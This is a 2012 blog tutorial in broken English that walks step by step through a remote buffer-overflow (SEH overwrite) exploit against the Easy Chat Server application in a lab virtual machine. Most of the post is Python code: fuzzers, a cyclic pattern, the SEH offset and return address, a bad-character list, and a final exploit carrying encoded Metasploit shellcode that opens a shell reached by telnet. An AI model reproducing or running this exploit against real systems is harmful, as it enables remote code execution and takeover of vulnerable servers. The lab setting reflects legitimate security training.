COMPUTER SECURITY: EASY CHAT SERVER

Okay we learn more about using the easyexploitation of chat server, but here is slightly different from the lesson on sebelunya exploitation.
Lest try with command in bellow :
1. Dowload aplikasi Easy Chat Server and install in vitual Box us.
2. Open or Run aplication Easy Chat Server
Example Image if you open easy Chat server.

Proses Registrasi in Easy Chat Server

Clik server for Run Easy Chat Server

Clik start Service

3. Open OllyDBG and Clik attack search in OllyDbg Easy Chat Server and clik attack again.

This example image in OllyDbg.

4. After that check All the aplication can run, the next search informaion about aplication can
useing for explotasi. Then we can are using aplication wireshark, and dont forget open to
mozzila for reading wireshark. This example image.

This image from mozila enter name and Password for read to continue.

This result wireshark from easy chat server

5. Next create fuzzer in terminal bactrack.

This simple fuzzer.

#!/usr/bin/python

import socket

bawah="\x41" * 5000

atas="GET /chat.ghp?username="+bawah+"&password=123&room=1&sex=0

HTTP/1.1\r\n\r\n"

atas+= "Host: 192.168.43.2\r\n"

s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('192.168.43.2',80))

s.send(atas + "\r\n\r\n")

s.close()

6. Run Easy Chat server and OllyDbg next run fuzzer.

This result from fuzzer we create.

If we clik view and chose Seh Chain appear 41414141

Next press Shift + F9 for continue proses

Next Right Clik and chose Follow in dump for check.

Next Clik view again and chose executable modules for see all modules in Easy Chat server. I am chosing ELOPRO32.DLL

Next Right Clik in stck and chose search for + sequence commands/ CTRL+S.

7. Next write POP r32, POP r32, RETN. Atfer that clik Find.

This example from POP r32.

8. Next Pattern_create.rb for make the pattern more than 5000 tersetuktur let us easier to

calculate how many kebyte teroverwriteSEH.

This example image from pattern_create.rb

9. Edit Fuzer and copy from pattern_create.rb 5000

#!/usr/bin/python
import socket
atas="GET /chat.ghp?username="+"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"+"&password=123&room=1&sex=0 HTTP/1.1\r\n\r\n"
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.43.2',80))
s.send(atas + "\r\n\r\n")
s.close()
This example image from fuzzer in the top.

Clik view and chose SEH chain.

The result from fuzzer in the top.

10. Next search byte how in the buffer to theteroverwrite in SEH

11. Next edit again fuzzer

#!/usr/bin/python

import socket

atas="GET /chat.ghp?username="

atas+="\x90" * 216

atas+="\xCC\xCC\xCC\xCC"

atas+="\x41\x41\x41\x41"

atas+="\x90" * (5005-len(atas))

atas+="&password=123&room=1&sex=0 HTTP/1.1\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('192.168.43.2',80))

s.send(atas + "\r\n\r\n")

s.close()

This example image.

12. Next Fuzzer for ascertain whether the exploits that we make is really directed at the

address correctly.

This simple fuzzer.

#!/usr/bin/python

import socket

atas="GET /chat.ghp?username="

atas+="\x90" * 216

atas+="\xCC\xCC\xCC\xCC"

atas+="\x54\x5A\xDD\x5E"

atas+="\x90" * (5005-len(atas))

atas+="&password=123&room=1&sex=0 HTTP/1.1\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('192.168.43.2',80))

s.send(atas + "\r\n\r\n")

s.close()

This example image :

The result from fuzzer in the top.

The result from we press Shift + F9 and press F7 for finis RETN, right clik in stack.

The result from follow in dump + Selection

13. Create shellcode or payloads.

# cd /pentest/exploits/framework2
# ./msfweb
This example image :

Next copy fronm msfweb 127.0.0.1:55555 in webrowser or mozilla.

Restricted Character I am Writing 0x00 0x0a 0x0d 0x2f 0x3a 0x25 0x68 0x3f 0x22 0x6e 0x52 0x40 0x7b

The result from restrict Character I am coping into my fuzzer.

14. This is simple fuzzer from I am copying payload.

#!/usr/bin/python

import socket

atas="GET /chat.ghp?username="

atas+="\x90" * 216

atas+="\xeb\x08\x90\x90"

atas+="\x54\x5A\xDD\x5E"

atas+="\x90" * 32

atas+=("\x33\xc9\xb1\x51\xd9\xc4\xd9\x74\x24\xf4\x58\xbe\x9b\xfb\x71\x3b"

"\x31\x70\x13\x83\xe8\xfc\x03\xeb\xf4\x93\xce\xf7\x61\xbf\x7c\xef"

"\x8f\xc0\x80\x10\x0f\xb4\x13\xca\xf4\x41\xae\x2e\x7e\x29\x34\x36"

"\x81\x3d\xbd\x89\x99\x4a\x9d\x35\x9b\xa7\x6b\xbe\xaf\xbc\x6d\x2e"

"\xfe\x02\xf4\x02\x85\x43\x73\x5d\x47\x89\x71\x60\x85\xe5\x7e\x59"

"\x5d\xde\x56\xe8\xb8\x95\xf8\x36\x42\x41\x60\xbd\x48\xde\xe6\x9e"

"\x4c\xe1\x13\x23\x41\x6a\x6a\x4f\xbd\x70\x0c\x4c\x8c\x53\xaa\xd9"

"\xac\x53\xb8\x9d\x3e\x1f\xce\x01\x92\x94\x6f\x31\xb2\xc2\xe1\x0f"

"\x44\xff\xae\x70\x8e\x99\x1d\xe8\x47\x55\x90\x9c\xe0\xea\xe6\x03"

"\x5b\xf2\xd7\xd3\xa8\xe1\x24\x18\x7f\x05\x02\x01\xf6\x1c\xcd\x3c"

"\xe5\xd7\x10\x6b\x9c\xe5\xeb\x43\x08\x33\x1a\x96\x64\x94\xe2\x8e"

"\x24\x48\x4e\x7d\x98\x2d\x23\xc2\x4d\x4d\x13\xa2\x19\xa0\xc8\x4c"

"\x89\x4b\x11\x05\x45\xe8\xc8\x55\x51\xa7\x13\x43\x37\x58\xbd\x3e"

"\x37\x88\x55\x64\x6a\x07\x4f\x33\x8a\x8e\xdc\xee\x8b\xff\x8b\xf5"

"\x3d\x86\x05\xa2\x42\x50\xc5\x18\xe9\x08\x19\x70\x82\xdb\x02\x09"

"\x63\x62\x9a\x16\xbd\xc0\xdb\x38\x24\x81\x47\xde\xc1\x36\xe5\x97"

"\xf7\xd3\xa5\xfe\xde\xef\xcf\xe7\x4b\xb4\x46\x05\xba\xf4\xaa\x63"

"\x43\xb6\x61\x8d\xfe\x1b\xe9\xfc\x85\x5b\xa6\x55\xd2\xf4\xca\x57"

"\x96\x13\xd4\xd2\x9d\xe4\xfc\x47\x49\x49\x50\x26\x24\x07\x53\x99"

"\x97\x82\x02\xe6\xc8\x45\x08\xc1\xec\x5b\x01\x0e\x38\x09\x59\x0f"

"\xf2\x31\x75\x64\xaa\x31\xf5\xbe\x31\x35\x2c\x6c\x45\x19\xb9\xee"

"\x61\x78\x49\x5d\x6d\xab\x51\xb1")

atas+="\x90" * (5005-len(atas))

atas+="&password=123&room=1&sex=0 HTTP/1.1\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('192.168.43.2',80))

s.send(atas + "\r\n\r\n")

s.close()

>. I try check fuzzer in the top whit Ollydbg and Easy Chat Server.

This example image :

>. Next I am runing Easy Chat server n my fuzzer and write command telnet
192.168.43.2

This is the result from telnet.

GOOD LUCK BROTHER......

COMPUTER SECURITY

Rabu, 22 Februari 2012

EASY CHAT SERVER

Tidak ada komentar:

Posting Komentar